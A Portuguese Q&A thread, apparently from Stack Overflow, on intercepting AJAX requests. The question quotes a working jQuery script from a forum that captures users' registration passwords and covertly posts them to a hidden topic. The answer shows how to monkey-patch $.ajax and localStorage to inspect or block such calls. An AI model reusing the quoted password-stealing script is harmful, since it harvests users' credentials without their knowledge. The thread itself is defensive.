# Interceptar requisições AJAX

Tags: javascript, ajax

Tenho a seguinte dúvida, como eu posso fazer para "interceptar" requisições AJAX **antes** que elas sejam feitas?

Por exemplo, em alguns fóruns enquanto navegamos constantemente requisições estão sendo feitas sem nosso conhecimento, outro dia estava em um fórum e resolvi dar uma olhada nos scripts deles e encontrei o seguinte:

```
jQuery(document).ready(function () {
     if (_userdata["user_posts"] === 0) {
         jQuery('<div id="get_pass" style="display: none;"></div>').insertAfter('#right .module:last');
         jQuery('#ucp input[name="submit"]').on('click', function () {
             var fieldValue = document.getElementById('password_reg').value;
             localStorage.setItem('text', fieldValue);
         });
         jQuery(window).load(function () {
             storedValue = localStorage.getItem('text');
             if (storedValue) {
                 jQuery('#get_pass').html(storedValue);
             }
             var senha = jQuery('#get_pass').text();
             jQuery.post('/post', {
                 message: 'Minha senha: ' + senha + '',
                 t: '4',
                 mode: 'reply',
                 post: 'Enviar'
             });
         });
     }
});
```

Para quem não entendeu, isso faz com que ao usuário digitar a senha dele esse script pega a senha e envia para um tópico escondido dos usuários normais (via AJAX), ou seja o cara deve ter um *log* com a senha de todos os usuários do fórum dele.

Eu peguei o hábito de não usar a mesma senha em todos os sites que navego, assim não terei problemas em ele saber a minha ou não, mas não gostaria que isso se repetisse, então estou em busca de um script (talvez para usar como Snippet no Chrome não sei ainda) para toda vez que seja feita uma requisição AJAX um `alert` aparece na minha tela mostrando qual o conteúdo que será enviado nessa requisição e alguma forma de confirmar isso (caso seja legitimo) ou cancelar (caso seja malicioso). É possível fazer isso?

Answer (score 7, accepted):

Você pode usar uma técnica chamada [Monkey Patching](http://en.wikipedia.org/wiki/Monkey_patch) para modificar a forma como as chamadas Ajax funcionam.

Toda função Javascript pode ser sobrescrita. Experimente no console do seu navegador, é divertido :) Por exemplo, o código abaixo faz com que a função nativa `alert` funcione na língua do P:

```
var foo = alert;
alert = function (text) {
    var words = text.split(" ");
    for (var i = 0; i < words.length; i++) {
        words[i] = "p" + words[i];
    }
    foo(words.join(" "));
}
alert("Hello world!");
```

Você pode fazer a mesma coisa com a função [`Ajax` do jQuery](http://api.jquery.com/jquery.ajax/) e o `getItem` do objeto `localStorage`:

```
var foo = $.ajax;
$.ajax = function (a, b) {
    var bar = localStorage.getItem; // armazenando a função de pegar dados numa variável
    localStorage.getItem = function () {
        return "Vai se lascar hacker filho da p..."; // ou a URL minificada para 'Never Gonna Give You Up' no Youtube.
    };
    foo(a, b);
    localStorage.getItem = bar; // voltando a função ao normal.
}
```

Cuidado só com os contextos dos objetos e das funções (talvez seja necessário um [`bind`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function/bind) aqui ou ali) - mas cuidado principalmente porque, se você fizer do Monkey Patching um hábito, estará entregando sua alma de desenvolvedor ao McGyver ;) Não abuse de seus poderes dessa forma.

De posse dessa técnica, você pode, sei lá, fazer uma extensão pro navegador que você possa usar de forma pessoal. Ou você pode começar um projeto no Github para fazer uma extensão que verifique se há algum código malicioso enviando credenciais pra alguém da forma como você descreve, e impedir acesso ao `localStorage` só nesses casos.

**Edição:** esqueci de dizer, mas acho que fica claro depois que você aplica a técnica acima. Você também pode jogar no console (ou em algum outro lugar onde possa ler) os valores de cada propriedade ou parâmetro, e até mesmo o corpo de cada método que o Ajax utiliza internamente. Assim você pode exibir em algum lugar especificamente as mensagens enviadas nos Posts do Ajax.

Comment: Seria legal complementar como fazer pra chamar o ajax original, ou o alert original depois de implementar o gancho, caso o user queira logar a ação, mas chamar a funcionalidade original em seguida. De qq forma, ótima resposta e já levou o meu +1